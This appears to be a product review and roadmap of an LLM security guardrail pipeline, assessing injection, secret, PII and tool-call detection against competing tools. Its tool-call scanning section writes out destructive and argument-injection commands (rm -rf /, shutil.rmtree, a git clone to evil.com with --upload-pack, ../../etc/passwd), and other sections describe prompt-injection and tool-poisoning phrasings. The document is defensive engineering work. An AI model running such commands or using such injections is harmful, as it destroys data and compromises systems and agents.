Pipeline Step Depth Analysis

End-to-end review of every pipeline step. what’s strong, what’s missing, and what the competition does better. Based on research into LLM Guard, NeMo Guardrails, Rebuff, Vigil, Lakera Guard, Pangea, Arthur Shield, Giskard, TruffleHog, GitLeaks, OWASP LLM Top 10 (2025), and real-world red team reports.

Before the LLM

1. `validate_input`. Input Validation

Current: Null bytes, UTF-8, garbage ratio, JSON depth, session repair (orphan tool results, empty messages, role merging).

Strengths: Session repair is unique. no competitor does this. Prevents real API errors from broken message arrays. JSON depth limit prevents stack overflow attacks.

Gaps & Recommendations:

Missing: Image/multimodal payload validation. GPT-4o and Claude accept images. Steganographic payloads and oversized images are a real attack vector. Add MIME type validation, image dimension/size limits, and optional image content scanning.
Missing: Token count estimation. Current check is byte-based. A 500KB input could be 200K tokens and cost $50. Add a fast tiktoken-based token estimate and a max_tokens config option. LLM Guard does this.
Missing: Language detection. If the org only operates in EN/FR/DE, reject Cyrillic/CJK input that’s likely an evasion attempt. Pair with injection detection (multilingual attacks bypass EN-only detectors).
Missing: Schema validation for tool params. Validate tool call arguments against the declared JSON schema before forwarding. Catches malformed tool calls early. Guardrails AI makes this a core feature.
Improvement: Content-type validation. Tool params could contain serialized objects (pickle, YAML load). Reject non-JSON content types.

Priority: HIGH (multimodal validation. the biggest blind spot as vision models become default)

2. `rate_limit`. Rate Limiting

Current: Fixed window, sliding window, token-based, per-user, warning threshold.

Strengths: Three strategies is comprehensive. Sliding window prevents burst abuse at boundaries. Warning threshold is good UX.

Gaps & Recommendations:

Missing: Adaptive rate limiting. If injection attempts are detected, automatically tighten the rate limit for that agent/user. Lakera Guard does this. “threat-responsive throttling.”
Missing: Cost-based rate limiting. Limit by estimated cost per window (not just tokens). A GPT-4o call costs 50x more than GPT-4o-mini for the same tokens.
Missing: Concurrency limits. Rate limits control calls/window but not simultaneous inflight calls. An agent sending 100 parallel requests stays under rate limits but DoSes the LLM provider. Add max_concurrent.
Improvement: Exponential backoff headers. Return Retry-After with exponential backoff in 429 responses. Standard HTTP but currently missing.

Priority: MEDIUM (adaptive + concurrency most impactful)

3. `budget_enforcement`. Budget Control

Current: Monthly USD, monthly tokens, hourly tokens. Reads from pipeline state repo.

Strengths: Three limit types cover most needs.

Gaps & Recommendations:

Missing: Per-model budget splits. “Max $50/mo on GPT-4o, unlimited GPT-4o-mini.” Right now a single budget covers all models. CISOs want granular cost control.
Missing: Budget alerts at thresholds. Fire a webhook at 50%, 80%, 90% of budget. Currently only blocks at 100%.
Missing: Daily/weekly budgets. Monthly is too coarse for startups iterating fast. Daily limits catch runaway agents faster.
Missing: Budget rollover/carry-forward. Some enterprises want unused budget to carry over.
Improvement: Real-time cost estimation pre-call. Before calling the LLM, estimate the cost of this specific call and check if it would exceed the budget. Prevents “last call blows the budget” scenarios.

Priority: MEDIUM (per-model splits and alerts are most requested by CISOs)

4. `detect_pii`. PII Detection

Current: Presidio (40+ entity types, NER, context scoring) + 13 regex patterns. Zero-width char stripping for evasion resistance. Custom patterns. Scanner cache integration.

Strengths: Presidio is the gold standard for structured PII. Regex fallback is smart for minimal deployments. Zero-width stripping is good.

Gaps & Recommendations:

Missing: Multi-language PII. Presidio’s default is EN-only. European CISOs need FR/DE/NL/ES PII patterns (BSN, NISS, Personalausweis, etc.). LLM Guard supports 50+ languages via custom recognizers. Add EU-specific recognizers for Belgian national number (Rijksregisternummer), German Steuer-ID, French NIR, Dutch BSN.
Missing: Context-aware false positive reduction. “The account number is 1234567890” should flag, but “page 1234567890 of the document” shouldn’t. Presidio’s context scoring helps but needs custom enhancers for business contexts.
Missing: PII in structured data. If tool params contain JSON with nested PII (e.g., a customer record), the flat text extraction misses it. Add recursive JSON PII scanning.
Missing: Name detection without Presidio. Regex can’t detect names. When Presidio isn’t installed, names go undetected. Add a lightweight name dictionary (top 10K names across EU languages) as a fallback.
Improvement: Configurable entity sensitivity. Not all PII is equal. A first name is less sensitive than a credit card. Allow per-entity-type on_detection overrides: "CREDIT_CARD": "block", "PERSON": "notify".

Priority: HIGH (EU multi-language PII is a must-have for European positioning)

5. `detect_secrets`. Secret Detection

Current: 74 regex patterns (AWS, GCP, Azure, OpenAI, GitHub, Stripe, etc.), Shannon entropy, base64 decoding, line-joining, comment-stripping, reversal detection. Custom patterns.

Strengths: Pattern database is competitive with TruffleHog/GitLeaks. Evasion detection (base64, line-joining, comments, reversal) is deeper than most. Entropy detection catches unknown formats.

Gaps & Recommendations:

Missing: Verification/validation. TruffleHog’s killer feature: it actually validates detected secrets (calls AWS STS, checks GitHub token scopes). A verified secret is 100x more actionable than a regex match. Add optional async verification for top providers (AWS, GitHub, Slack, Stripe).
Missing: Git diff / commit context. When the input contains code diffs or commit messages, the secret might be in a - line (removed) vs + line (added). Only + lines matter. Add diff-aware scanning.
Missing: Allowlisting. Known-safe patterns (test keys, example tokens, documentation patterns) cause noise. Add allow_patterns config. TruffleHog and GitLeaks both have this.
Missing: Secret rotation recommendations. When a secret is detected, tell the user what to do: “Rotate this AWS key at console.aws.amazon.com/iam.” Pangea does this.
Improvement: Reduce false positives on JWTs. The jwt pattern matches any JWT, but JWTs are designed to be sent. they’re not secrets. Flag JWTs only when they appear in unexpected contexts (user message, not auth header). Currently high FP.
Missing: HashiCorp Vault transit tokens, Doppler tokens, 1Password service accounts, Infisical tokens. Growing secret managers have their own token formats.

Priority: HIGH (verification transforms this from “maybe a secret” to “confirmed leaked credential”)

6. `detect_infra`. Infrastructure Data

Current: 10 patterns (internal hostname, private IP, DB connection string, env server, infra config, infra service, K8s config, Docker registry, custom domain).

Strengths: Catches the common categories.

Gaps & Recommendations:

Missing: Cloud-specific resource identifiers. AWS ARNs (arn:aws:*), GCP resource names (projects/*/locations/*), Azure resource IDs (/subscriptions/*/resourceGroups/*). These leak cloud topology.
Missing: Internal URL detection. URLs with .internal, .local, .corp, .lan TLDs, or non-public DNS (e.g., api.staging.acme.internal).
Missing: CI/CD identifiers. GitHub Actions workflow URLs, Jenkins build URLs, GitLab CI pipeline references. These reveal deployment infrastructure.
Missing: Kubernetes secrets in plain text. kubectl get secret -o yaml output contains base64-encoded secrets that aren’t caught by detect_secrets because they’re in a YAML context.
Improvement: Configurable internal domain patterns. Every org has different internal domains. Add internal_domains: ["*.acme.internal", "*.corp.acme.com"] config.

Priority: MEDIUM (cloud ARNs and internal URLs are the most commonly leaked)

7. `detect_business`. Business Data

Current: 9 patterns (financial figure, large amount, board decision, strategic info, competitive intel, customer data, HR personnel, legal matter).

Strengths: Covers the major categories. Unique step. no competitor does this.

Gaps & Recommendations:

Missing: Industry-specific patterns. Healthcare (diagnosis codes, drug names, patient IDs), legal (case numbers, court references), financial (SWIFT codes, ISIN numbers, CUSIPs). Configurable per industry.
Missing: Context-aware matching. “$50M” in a financial report discussion is expected; in a casual question it’s a leak. Weight by surrounding context.
Missing: Code names / project names. Many orgs use code names for M&A targets, products, etc. Add configurable sensitive_terms: ["Project Phoenix", "Operation Sunrise"].
Missing: NDA/confidentiality markers. Text containing “CONFIDENTIAL”, “PRIVILEGED”, “ATTORNEY-CLIENT” should auto-escalate classification.
Improvement: Revenue/valuation number extraction. Current patterns are simple regex. Use numeric extraction with currency awareness to catch “twelve million dollars” and “€2.5M revenue.”

Priority: MEDIUM (NDA markers and custom terms are quick wins)

8. `detect_unicode`. Unicode / Homoglyph

Current: 85+ dangerous codepoints, 85+ confusable mappings, suspicious categories, combining mark floods, mixed-script detection, zero-width chars, bidi overrides.

Strengths: Very thorough. Mixed-script word detection is rare among competitors. Combining mark flood detection is good.

Gaps & Recommendations:

Missing: Punycode/IDN homoglyph detection. Internationalized domain names can contain homoglyphs (аpple.com with Cyrillic а). Detect Punycode domains in URLs.
Missing: Invisible character normalization. Instead of just detecting zero-width chars, offer a normalization mode that strips them and continues. Useful when blocking is too aggressive (accessibility tools insert zero-width chars).
Improvement: Configurable script allowlists. A Japanese org expects CJK; a European org expects Latin+Cyrillic. allowed_scripts: ["Latin", "Common"] would reduce FPs.

Priority: LOW (current implementation is already strong)

9. `detect_injection`. Prompt Injection

Current: 87 patterns across 7 categories (structural, behavioral, jailbreaks, obfuscation, indirect, multilingual, metaphorical). Base64 decoding, leetspeak normalization, compound scoring. Tool result scanning. Custom patterns.

Strengths: Deepest regex-based injection detector I’ve seen. Multilingual coverage (10 languages), metaphorical bypass detection, indirect injection from tool outputs. these are rare. Compound scoring for weak signals is smart.

Gaps & Recommendations:

Missing: ML-based classifier. Regex catches known patterns but misses novel attacks. Rebuff uses a fine-tuned BERT classifier alongside regex. Lakera Guard’s core is an ML model. Add an optional lightweight classifier (DistilBERT fine-tuned on injection datasets) as a second opinion alongside regex. Run it only when regex score is ambiguous (0.3-0.7).
Missing: Perplexity-based detection. Novel attacks have high perplexity (unusual token sequences). LLM Guard uses perplexity scoring as a signal. A fast perplexity estimate using a small model could catch attacks that don’t match any pattern.
Missing: Prompt/response boundary enforcement. Ensure the LLM’s system prompt separator hasn’t been breached. NeMo Guardrails enforces strict message boundaries.
Missing: Canary token injection. Inject a unique canary into the system prompt; if it appears in the output, the system prompt was leaked. Lakera and Arthur Shield use this technique.
Missing: Multi-turn injection tracking. A slow injection spread across 5 turns (each individually benign) isn’t caught. Track injection scores across the session and alert on cumulative risk.
Missing: Image-based injection. Text rendered in images bypasses all text-based detection. As vision models become standard, OCR-based injection scanning is needed.
Improvement: Adversarial robustness testing. Run the HackAPrompt and Gandalf datasets as a CI benchmark. Track detection rate over time. Giskard provides this as a testing framework.

Priority: CRITICAL (ML classifier is the single biggest improvement. catches novel attacks regex never will)

10. `detect_escalation`. Privilege Escalation

Current: 4-stage model (recon → access → exfil → priv-esc), cross-turn tracking, context-aware scoring, keyword combinations.

Strengths: Multi-stage model is more sophisticated than simple keyword matching. Context awareness reduces FPs.

Gaps & Recommendations:

Missing: Behavioral baseline. What’s “normal” for this agent? An admin agent asking for user lists is normal; a customer support agent doing it is suspicious. Add per-agent behavioral profiles.
Missing: Semantic similarity to known attack chains. Use embedding similarity against a database of known escalation chains (MITRE ATT&CK for LLMs).
Improvement: Integration with tool permissions. If the agent asks about tools it doesn’t have permission to use, that’s a stronger recon signal than generic questions.

Priority: LOW (current implementation is adequate for most use cases)

11. `detect_tool_poison`. Tool Poisoning

Current: 11 patterns for injection in tool descriptions (ignore instructions, override system, act as, do not tell, exfiltration URLs, priority manipulation, hidden instructions).

Strengths: Catches the known MCP tool poisoning attacks.

Gaps & Recommendations:

Missing: Tool schema validation. Verify tool definitions match an expected schema. An attacker could add extra parameters not in the spec that carry injection payloads.
Missing: Tool definition diffing. If a tool’s description changed since last seen, flag it. Supply chain attacks modify tool definitions gradually.
Missing: URL/domain reputation check. Tool descriptions containing URLs to unknown/suspicious domains should be flagged. Use a domain reputation API (VirusTotal, URLhaus).
Missing: Excessive instruction detection. Tool descriptions longer than N chars or containing unusual formatting (multiple paragraphs of “IMPORTANT” instructions) are suspicious.
Improvement: Hash-based tool integrity. Store a hash of each tool’s definition at registration. If it changes at runtime, alert. This catches dynamic tool poisoning via compromised MCP servers.

Priority: HIGH (supply chain attacks via MCP are a growing threat. tool integrity verification is essential)

12. `classify_data`. Data Classification

Current: 4-level classification (PUBLIC → INTERNAL → CONFIDENTIAL → RESTRICTED). Aggregates all detection findings. Optional LLM semantic classifier. LLM can only escalate, never downgrade.

Strengths: Deterministic classification from regex findings + optional LLM escalation is the right architecture. “Can only escalate” is a good security principle.

Gaps & Recommendations:

Missing: Org-specific classification rules. “Any mention of Project X is RESTRICTED.” “All customer IDs are CONFIDENTIAL.” Allow CISO-defined rules beyond the built-in heuristics.
Missing: Data classification labels/tags. Beyond the 4 levels, support custom tags: “GDPR_PERSONAL_DATA”, “HIPAA_PHI”, “SOX_FINANCIAL”. This enables regulatory-specific routing.
Improvement: Confidence scoring. Return a confidence level with the classification. “CONFIDENTIAL (95%)” vs “CONFIDENTIAL (62%).” Low confidence triggers the LLM classifier automatically.

Priority: MEDIUM (custom rules and regulatory tags most valuable)

The Call

13. `call_llm`. LLM Call

Current: Timeout, fallback model, circuit breaker with error classification, cooldown with retry-after.

Strengths: Circuit breaker with error classification is production-grade. Fallback model prevents outages.

Gaps & Recommendations:

Missing: Request/response logging for compliance. Log the full request and response (with PII redacted) for audit. GDPR Article 30 requires processing records.
Missing: Model version pinning. LLM providers update models silently. A pinned version (gpt-4o-2024-11-20) prevents surprise behavior changes. Add pin_version config.
Missing: Response validation. Check that the response is well-formed (valid JSON for function calls, non-empty content). Malformed responses should retry, not propagate.
Missing: Streaming support. Currently blocks on full response. Streaming would reduce time-to-first-token. More complex to scan but important for UX.

Priority: MEDIUM (streaming is the most impactful for developer experience)

14. `call_tool`. Tool Call

Current: Timeout, response size limit, error redaction.

Strengths: Good basics.

Gaps & Recommendations:

Missing: Sandboxed execution. Tool calls should execute in a sandboxed environment (container, WASM, seccomp). Currently relies on the tool itself being safe.
Missing: Network isolation. Tool calls shouldn’t be able to reach arbitrary endpoints. Add configurable network policies (allow/deny lists for outbound connections).
Missing: Resource limits. CPU time, memory, disk I/O limits for tool execution. Prevents resource exhaustion attacks.
Missing: Output sanitization. Tool output could contain HTML, JavaScript, or other injection payloads that flow back to the LLM. Sanitize before returning.

Priority: HIGH (sandboxing is the #1 missing capability for agentic security)

15. `tool_permissions` / `tool_constraints` / `user_tool_scopes`

Current: Per-tool allow/block, per-operation permissions, parameter validation (string patterns, numeric ranges, length, cross-parameter), user-level scoping.

Strengths: The three-layer model (permissions → constraints → scopes) is more granular than any competitor.

Gaps & Recommendations:

Missing: Time-based permissions. “Tool X only allowed during business hours.” “Emergency access to production database for 2 hours.” Temporal access control is standard in enterprise IAM.
Missing: Approval workflows. “Tool X requires manager approval before execution.” For high-risk operations, add a human-in-the-loop step.
Missing: Tool call rate limiting. Separate from the global rate limit. “Max 10 database queries per minute” prevents a stuck agent from hammering a database.
Improvement: Permission inheritance. Group tools into categories with shared permissions. Currently each tool is configured individually.

Priority: MEDIUM (time-based permissions and approval workflows most requested)

16. `scan_tool_calls`. Tool Call Scanning

Current: 4 regex patterns, deny command/path lists, fnmatch for path patterns, shell argument parsing.

Strengths: Shell argument parsing with shlex is better than naive string matching.

Gaps & Recommendations:

Missing: Semantic command analysis. rm -rf / is caught, but find / -delete or python -c "import shutil; shutil.rmtree('/')" aren’t. Need a broader dangerous operation database.
Missing: File path normalization. ../../etc/passwd, /var/../etc/passwd, symlink following. Normalize paths before matching deny patterns.
Missing: Argument injection detection. git clone https://evil.com -- --upload-pack="evil". Detect double-dash argument injection.
Missing: Command chaining detection. echo safe && rm -rf / or echo safe; rm -rf /. Parse command chains, not just the first command.
Improvement: Integration with detect_code_exec. Currently these are separate. Code execution detection should feed into tool call scanning for a unified view.

Priority: HIGH (command chaining and path traversal are common bypasses)

After the LLM

17. `scan_output`. Output Scan + DLP

Current: PII, secrets, infra, business data detection on response. Redaction of PII, infra, business data. Stack trace stripping. Sensitive pattern removal (paths, internal URLs, private keys). LLM safety judge option. Scanner cache integration.

Strengths: Full DLP pipeline is unique. Stack trace stripping prevents information disclosure. LLM judge as optional second opinion is good architecture.

Gaps & Recommendations:

Missing: Hallucination detection. If the LLM generates a plausible-looking but fake API key, phone number, or address, it could cause downstream issues. Cross-reference generated data against the input to detect fabrication.
Missing: Toxicity/bias detection. OWASP LLM Top 10 includes harmful output. Add content safety scoring (toxicity, bias, adult content). LLM Guard has multiple output content validators.
Missing: Factual grounding check. For RAG applications, verify the output is grounded in the retrieved context. Detect when the LLM ignores the context and halluccinates.
Missing: Jailbreak success detection. If detect_injection flagged the input but the LLM responded anyway (not blocked), check if the response actually complied with the injection. This is what the LLM judge should specifically look for.
Improvement: Streaming-compatible scanning. Current scan requires the full response. For streaming, implement incremental scanning with a sliding window.
Missing: Output format validation. If the agent expects JSON, validate the output is valid JSON before returning. Malformed output causes agent crashes.

Priority: HIGH (toxicity/content safety is a major gap. required by EU AI Act)

18. `taint_check`. Taint Tracking

Current: Tracks PII and secrets from input. Checks if they flow into tool call arguments. Categorized sinks (shell, network, code, email, database).

Strengths: Taint tracking is rare in LLM security. Sink categorization is thoughtful.

Gaps & Recommendations:

Missing: Taint propagation through tool chains. In a multi-step agent, data flows: input → tool1 → tool2 → tool3. Current implementation only tracks input → first tool call. Need cross-step propagation.
Missing: Derived data tracking. If the LLM sees john@acme.com and generates john at acme dot com, the taint is lost. Add fuzzy matching for derived forms.
Improvement: Configurable sink sensitivity. Not all sinks are equal. Writing to a local log file is less dangerous than sending via email. Allow per-sink on_detection overrides.

Priority: MEDIUM (multi-step propagation is the most impactful improvement)

19. `shell_bleed`. Shell Bleed Detection

Current: 5-language env var detection (Shell, Python, Node, Ruby), safe var exclusion, secret keyword matching.

Strengths: Multi-language support is comprehensive.

Gaps & Recommendations:

Missing: .env file reference detection. cat .env, source .env, dotenv.config(). References to dotenv files are as dangerous as direct env var references.
Missing: Config file secret references. config.yaml, secrets.json, credentials.xml references in generated code.
Missing: Rust/Go/Java env var patterns. std::env::var("SECRET"), os.Getenv("API_KEY"), System.getenv("DB_PASSWORD").
Improvement: Detect secrets embedded in code. Not env vars but hardcoded secrets: api_key = "sk-..." in generated code.

Priority: LOW (current coverage handles the most common languages)

20. `loop_guard`. Loop Guard

Current: Per-session tracking, identical call counting, warning injection, circuit breaking, max total calls.

Strengths: Warning before blocking is good UX. Max total calls prevents cost runaway.

Gaps & Recommendations:

Missing: Semantic loop detection. Agent calls search("AI market") then search("AI market trends") then search("market for AI"). different strings, same intent. Use embedding similarity to detect semantic loops.
Missing: Progress tracking. A legitimate agent might call the same tool 10 times with different params (iterating over a list). Detect lack of progress rather than just repetition.
Improvement: Cross-session loop detection. If an agent hits the loop limit, gets restarted, and immediately loops again, detect the meta-loop.

Priority: LOW (current implementation handles the common case well)

21. `dedup_output`. Output Dedup

Current: Exact + normalized matching against tool results and input. Configurable min length.

Strengths: Catches the common “LLM copies tool output verbatim” failure mode.

Gaps & Recommendations:

Missing: Partial dedup. LLM copies 80% of tool output with minor modifications. Current implementation only catches exact/normalized matches.
Improvement: Token-based dedup. Measure output tokens that are direct copies of input tokens. If >70% are copies, flag it. More robust than string matching.

Priority: LOW (nice-to-have, not security-critical)

Cross-Cutting Gaps (Not in Any Single Step)

A. Observability & Metrics

Missing: Prometheus/OpenTelemetry metrics export. Step latency histograms, detection counts by type, block rates. Essential for production monitoring.
Missing: Detection trend dashboards. “Injection attempts increased 300% this week.” Time-series analysis of security events.

B. Testing & Validation

Missing: Red team automation. Built-in adversarial testing that runs the HackAPrompt, Gandalf, and custom attack datasets against the pipeline. Giskard provides this.
Missing: Regression testing. When a pattern is updated, automatically verify it still catches known attacks and doesn’t introduce new FPs.

C. Response to Detection

Missing: Automated incident response. When a high-severity detection occurs, automatically: revoke agent API key, notify CISO via webhook, quarantine conversation. Currently all responses are per-request.
Missing: Adaptive security posture. If injection attempts increase, automatically tighten thresholds across the pipeline. Return to normal after the attack subsides.

D. Privacy & Compliance

Missing: Data minimization. GDPR requires processing only necessary data. Log and store only what’s needed. Currently audit logs may contain more data than necessary.
Missing: Right to erasure. GDPR Article 17. Ability to delete all data for a specific user across audit logs, pipeline state, and findings.
Missing: Data Processing Agreement (DPA) enforcement. When routing to an LLM provider, verify the provider has a valid DPA. Block calls to non-compliant providers.

Priority Matrix

Priority	Steps / Gaps	Impact
CRITICAL	ML-based injection classifier	Catches novel attacks regex never will
HIGH	Multimodal input validation	Vision models are becoming default
HIGH	EU multi-language PII	Core positioning as European product
HIGH	Secret verification	Transforms FYI into actionable alert
HIGH	Tool definition integrity	MCP supply chain attacks are growing
HIGH	Toxicity/content safety	Required by EU AI Act
HIGH	Command chaining in scan_tool_calls	Common bypass technique
HIGH	Tool execution sandboxing	#1 missing capability for agents
MEDIUM	Adaptive rate limiting	Threat-responsive defense
MEDIUM	Per-model budget splits	Most requested by CISOs
MEDIUM	Custom classification rules	Enterprise customization
MEDIUM	Streaming LLM support	Developer experience
MEDIUM	Multi-step taint propagation	Agentic workflow security
MEDIUM	Time-based permissions	Enterprise IAM standard
MEDIUM	Cloud resource ID detection	Common infrastructure leak
LOW	Semantic loop detection	Nice-to-have
LOW	Additional shell bleed languages	Diminishing returns
LOW	Unicode script allowlists	Current impl is strong
LOW	Partial dedup	Not security-critical

Pipeline Step Depth Analysis

Before the LLM

1. validate_input. Input Validation

2. rate_limit. Rate Limiting

3. budget_enforcement. Budget Control

4. detect_pii. PII Detection

5. detect_secrets. Secret Detection

6. detect_infra. Infrastructure Data

7. detect_business. Business Data

8. detect_unicode. Unicode / Homoglyph

9. detect_injection. Prompt Injection

10. detect_escalation. Privilege Escalation

11. detect_tool_poison. Tool Poisoning

12. classify_data. Data Classification

The Call

13. call_llm. LLM Call

14. call_tool. Tool Call

15. tool_permissions / tool_constraints / user_tool_scopes

16. scan_tool_calls. Tool Call Scanning

After the LLM

17. scan_output. Output Scan + DLP

18. taint_check. Taint Tracking

19. shell_bleed. Shell Bleed Detection

20. loop_guard. Loop Guard

21. dedup_output. Output Dedup

Cross-Cutting Gaps (Not in Any Single Step)

A. Observability & Metrics

B. Testing & Validation

C. Response to Detection

D. Privacy & Compliance

Priority Matrix

1. `validate_input`. Input Validation

2. `rate_limit`. Rate Limiting

3. `budget_enforcement`. Budget Control

4. `detect_pii`. PII Detection

5. `detect_secrets`. Secret Detection

6. `detect_infra`. Infrastructure Data

7. `detect_business`. Business Data

8. `detect_unicode`. Unicode / Homoglyph

9. `detect_injection`. Prompt Injection

10. `detect_escalation`. Privilege Escalation

11. `detect_tool_poison`. Tool Poisoning

12. `classify_data`. Data Classification

13. `call_llm`. LLM Call

14. `call_tool`. Tool Call

15. `tool_permissions` / `tool_constraints` / `user_tool_scopes`

16. `scan_tool_calls`. Tool Call Scanning

17. `scan_output`. Output Scan + DLP

18. `taint_check`. Taint Tracking

19. `shell_bleed`. Shell Bleed Detection

20. `loop_guard`. Loop Guard

21. `dedup_output`. Output Dedup